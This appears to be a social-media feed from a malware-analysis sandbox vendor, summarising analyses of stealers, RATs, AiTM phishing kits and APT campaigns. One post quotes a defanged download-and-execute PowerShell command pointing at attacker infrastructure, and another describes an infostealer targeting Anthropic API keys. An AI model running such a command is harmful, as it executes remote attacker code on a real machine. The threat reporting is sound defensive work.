Deep Malware and Phishing Analysis for Windows, Android, macOS and Linux.

Joined August 2010
773 Photos and videos
Pinned Tweet
Really nice paper on defeating evasive malware - huge kudos to the authors πŸ‘πŸ”₯ In a nutshell: They use AI-generated instruction-skip YARA rules to automatically bypass evasions inside CAPE and expose hidden malware behavior 🀯 Also interesting: Joe Sandbox came out as the clear leader for malware family detection compared to the other sandbox platforms in their evaluation πŸ†πŸ¦  Great to see academic research using Joe Sandbox as a strong benchmark πŸ’ͺ buff.ly/Rw9xpVo
2
18
56
12,596
🚨 Python "WSUS exploit" or malware trap? 🐍 Joe Reverser found a fake exploit-generation script hiding obfuscated marshal payloads that launch download chains for Windows πŸͺŸ and macOS 🍎. Observed: βš™οΈ Go reflective loader 🍎 MAC Stealer 🌐 py-installer[.]com lookalike infra πŸ” Encrypted staging 🧠 In-memory execution 🎯 Likely targeting security researchers, exploit collectors, and malware analysts. buff.ly/t94b7kI #ThreatIntel #MalwareAnalysis #CyberSecurity
1
15
59
3,313
🚨 New malware analysis: Trojanized Solara/Yuta loader abusing LLM functionality πŸ€–βš οΈ The .NET app masquerades as a Roblox utility while integrating DeepSeek to generate Roblox Luau exploit scripts. Its hardcoded prompt steers the model toward exploit-oriented primitives such as hookmetamethod(), hookfunction(), getgenv(), gethui(), and remote invocation. It also includes an "AI reconstructor" feature that feeds Roblox script sources into the LLM to clean, rename, comment, reconstruct, and deobfuscate code while preserving functionality. 🧩 But the AI features are only part of the story: behind the UI, the app silently retrieves a second-stage Python stealer/RAT via Pastebin β†’ MediaFire. πŸ“₯ The payload includes credential theft, Discord/Telegram C2, persistence, keylogging, screenshot capture, AMSI/ETW patching, and Defender evasion. buff.ly/8WbOPMp Verdict: Malicious β€” 10/10 πŸ”₯
2
28
69
4,637
Full Prompt
2
13
539
Unknown phishing kit with browser-fingerprinting / VM-detection spotted πŸ•΅οΈβ€β™‚οΈ The script probes WebGL, RTC/STUN, plugins, console behavior, prototype hooks, screen/window/navigator props and more to identify analysis environments. Joe Sandbox detects the evasion and directly chains the run to a bare-metal analyzer β€” where the phishing payload continues execution πŸ’ͺπŸ”₯ πŸ”— buff.ly/Efang1e πŸ”— buff.ly/mND50Rp #JoeSandbox #Phishing #MalwareAnalysis #ThreatIntel #CyberSecurity #DFIR #Evasion
14
24
1,840
🚨 New analysis from Joe Reverser: Sikka BFaaS β€” an operationalized Indian banking fraud toolkit targeting SBI, HDFC, Paytm, BHIM/NPCI UPI, FreeCharge, PhonePe, Axis Bank & IRCTC. πŸ” Implements HWID-bound licensing, reseller/operator roles, AES-encrypted C2 traffic, and encrypted `.rg` session files. 🧬 Uses stolen mobile banking API keys, device fingerprint spoofing, OAuth/session hijacking, OTP interception flows, and UPI cryptographic abuse. πŸ›‘οΈ Includes anti-debugging, VM checks, tool blacklisting, registry tampering, and Chrome/WebDriver automation. Deep technical breakdown in Joe Reverser. πŸ”βš™οΈ buff.ly/ssnHBf0
9
30
2,398
🚨 Firebase-Powered PowerShell Backdoor Targeting Indian Entities 🚨 πŸ”΄ Key findings: β€’ Fake PDF decoy dropped to distract victims πŸ“„ β€’ Persistence via disguised Microsoft Edge scheduled task πŸ•΅οΈ β€’ Firebase used as stealth C2 infrastructure ☁️ β€’ Remote command execution through PowerShell ⚑ β€’ Typosquatting domain: thehindus[.]org impersonating The Hindu πŸ“° β€’ Hidden stage-2 payload: `irm https[:]//thehindus[.]org/jk | iex` 🧬 TTPs observed: βœ… PowerShell abuse βœ… LOLBins (`conhost.exe --headless`) βœ… Base64 obfuscation βœ… Firebase dead-drop C2 βœ… Scheduled task persistence βœ… Recon exfiltration 🎯 Likely aligned with SideCopy-style tradecraft targeting Indian entities. IOC Highlights: 🌐 thehindus[.]org 🌐 my-automation-a936d-default-rtdb[.]firebaseio[.]com 🧾 SHA256: 8c91214e0553bb3bd6c57b9eaae70099fe2d5bcd44a6beeaa3e3fab4f775397c Verdict: πŸ”₯ MALICIOUS (9/10) buff.ly/jq0zxTf #Malware #ThreatIntel #CyberSecurity #DFIR #ThreatHunting #PowerShell #APT #SideCopy #InfoSec #MalwareAnalysis
3
23
83
6,728
🚨 AI-generated phishing kits are evolving FAST. We analyzed a fully operational Microsoft 365 AiTM phishing framework using: ☁️ Cloudflare Tunnels πŸ›‘οΈ Dual CAPTCHA gates 🎯 Targeted victim prefill πŸ”‘ Real-time MFA interception πŸ€– Strong LLM-generated code fingerprints Attack flow: Google Redirect β†’ CAPTCHA β†’ CAPTCHA β†’ Fake Microsoft Login β†’ Live Credential Relay Highlights: ⚑ MFA push approval interception 🌍 Victim fingerprinting via 4 IP intel services 🎭 Multi-brand impersonation (OneDrive, Adobe, Teams, SharePoint & more) πŸ”„ Dynamic OAuth-style URL obfuscation πŸ’Έ Zero-cost rotating infrastructure via TryCloudflare This wasn't a simple phishing page. It was a scalable AI-assisted phishing platform. Full technical analysis below πŸ‘‡ buff.ly/92zzR4q #CyberSecurity #Phishing #AiTM #ThreatIntelligence #M365 #SOC #DFIR #Cloudflare #OSINT #MalwareAnalysis #Infosec #CyberThreats #LLM
29
100
6,612
🚨 New research from Joe Security: A spear-phishing campaign targeting Pakistan’s PSCA & PPIC3 abused ⚑ VS Code Remote Tunnels and Discord webhooks for stealthy remote access. Instead of stealing Microsoft accounts, attackers enrolled victim machines into their own VS Code tunnel infrastructure using device-code authentication - a clever twist on classic phishing techniques. 🎯 Key findings: πŸ”Ή Malicious Office macros downloading & executing `code.exe` πŸ”Ή Abuse of legitimate VS Code tunneling workflows πŸ”Ή Discord webhooks used for exfiltration & status reporting πŸ”Ή ClickOnce-based PDF delivery chain impersonating Adobe Reader πŸ”Ή Trusted Microsoft infrastructure leveraged for persistence & stealth This campaign highlights how threat actors increasingly weaponize legitimate developer tooling to blend into normal cloud traffic. β˜οΈπŸ’» Read the full analysis here πŸ‘‡ buff.ly/BE5w9Yq #CyberSecurity #ThreatIntelligence #MalwareAnalysis #Phishing #VSCode #Microsoft #BlueTeam #DFIR #JoeSecurity
17
30
3,065
🚨 Auphora Stealer: AI apps entering infostealer scope Early signals point to "Claude-aware" collection routines (e.g., harvest_claude()): β€’ Electron storage parsing (LevelDB / IndexedDB) β€’ Session cookies & auth artifacts β€’ Extensions / MCP configs β€’ User context data 🎯 Primary objective: Anthropic API keys – from LevelDB state – from ANTHROPIC_API_KEY env vars AI desktops should be treated like browsersβ€”same surface, higher value. buff.ly/cXAEr5w
7
21
2,505
🚨 Threat Insight: Emerging LLM-Generated Infostealer πŸ€–πŸ›‘ A Python-based infostealer 🐍 has surfaced under the label β€œHackerAI Stealer Pipeline,” presented as an β€œauthorized pentesting tool.” Despite the branding, the workflow clearly aligns with credential-theft operations: Chrome password extraction πŸ” β†’ data staging πŸ“¦ β†’ Telegram exfiltration πŸ“€ β†’ self-deletion 🧹. Attribution to a specific platform remains unverified ⚠️. However, the structured pipeline, consistent formatting, and descriptive comments strongly suggest LLM-assisted development πŸ§ πŸ’». This reflects a broader shift πŸ“ˆ: adversaries are leveraging AI to rapidly generate and refine commodity malware, reducing development effort while increasing scalability. buff.ly/xRtREhP #ThreatIntel #CyberSecurity #Malware #LLM
2
35
95
10,462
🚨 Malware Analysis Drop 🚨 A trojanized UninstallTool.exe isn’t what it claims to be… πŸ” Static reversing (Joe Reverser): β€’ Fake Authenticode signer 🎭 β€’ Embedded PE payload .NET in-memory loader 🧩 β€’ Privilege escalation & persistence APIs βš™οΈ πŸ§ͺ Dynamic analysis (Joe Sandbox): β€’ 100/100 malicious score πŸ’― β€’ ZTrat RAT with ngrok C2 tunnel 🌐 β€’ Drops Recovery.exe scheduled task persistence ⏱️ β€’ Firewall bypass & stealthy comms πŸ”₯ 🎯 Verdict: Legit app disguise β†’ full RAT infection chain Static dynamic = full visibility πŸ‘€ buff.ly/xzPJJMQ buff.ly/owxiQ3V #malware #cybersecurity #threatintel #reverseengineering
13
58
3,793
🚨 Advanced spear-phishing campaign uncovered by Joe Reverser Initial access via themed lure ("Safe Jail Project") with dual attachments: β€’ DOC: VBA macro dropper executing staged payload β€’ PDF: Fake Adobe Reader lure triggering alternate infection path Payload delivery via BunnyCDN-backed infrastructure β†’ execution establishes persistence by abusing Microsoft VS Code Remote Tunnel (LOLbin technique) C2/exfiltration signaling via Discord webhook β€” blending malicious traffic with trusted services to evade detection 🧠 Detected & analyzed by Joe Reverser πŸ” Full technical breakdown: buff.ly/PiclLSY
5
47
183
10,632
🧡 From a "harmless" DLL to a fully reconstructed multi-stage #CobaltStrike Beacon. In our latest blog, we break down how we: πŸ” Uncovered a hidden multi-stage loader chain 🧠 Bypassed anti-sandbox domain checks πŸ› οΈ Rebuilt dumped memory into runnable PE files 🌐 Reconstructed C2 comms & crypto 🎯 Extracted IOCs and linked the implant to known infrastructure A deep dive into loader reconstruction, memory forensics, protocol analysis, and attribution. Read it here: buff.ly/KphCsNI #MalwareAnalysis #ThreatIntel #DFIR #ReverseEngineering #InfoSec
1
11
24
1,799
🚨 CVE-2026-34621 – Adobe Acrobat Reader PDF Vulnerability πŸ“„βš οΈ Multiple analysts have taken a deep dive into this threat using πŸ§ͺ Joe Reverser β€” definitely worth exploring: πŸ” Analysis #1 buff.ly/T4cobjJ πŸ” Analysis #2 buff.ly/BAskKQM Packed with insights into modern PDF exploitation techniques πŸ’‘πŸ› οΈ #malware #infosec #threatanalysis
21
57
3,873
HWmonitor supply chain attack 🚨 (kudos to @OfficialPCMR πŸ™Œ) confirmed by Joe Reverser πŸ”πŸ’» buff.ly/Yo8nLis Stay cautious when downloading updates βš οΈπŸ“¦ and always verify sources πŸ”βœ…
12
24
2,232
🚨 Joe Reverser's Export Mode (rebranded from Skill Only Mode) in action - you can dive deep, ask the agent specific questions, and really understand what’s going on inside a sample. Take this recent case πŸ‘‡ A 64-bit loader hiding a Meterpreter reverse shell: β€’ RC4-encrypted payload in .fltpk β€’ Dynamic API resolution via PEB walking β€’ Anti-debugging (RDTSC BeingDebugged) β€’ Heavy obfuscation to evade static tools No more just reading reports β€” now you can explore and question every layer. πŸ”¬ Check the report: buff.ly/iQzkyyY ✨ Bonus: The report now includes a capability image workflow & IOC diagrams
1
5
6
1,082
Google: β€œWe’ve added protections to stop potentially unwanted apps from changing your search engine.” PUA devs: fine, we’ll just politely navigate there with 40 Tabs and hit Enter until it works (source Joe Reverser)
3
7
1,132
πŸš€ Joe Reverser 1.0.0 β€œSilver Wolf” is officially out! This stable release brings major upgrades for automated malware & phishing analysis: β€’ Full Chromium web agent for realistic attack navigation β€’ Redesigned Code Sandbox for faster deobfuscation workflows β€’ Skill Only Mode for precise analyst control β€’ Chat Report for full analysis traceability β€’ Office document analysis for phishing campaigns From phishing lure to final payload β€” analyze the full attack chain with greater depth and transparency. Read the release: buff.ly/dfj94NA #cybersecurity #malware #threatintel #phishing
13
36
3,404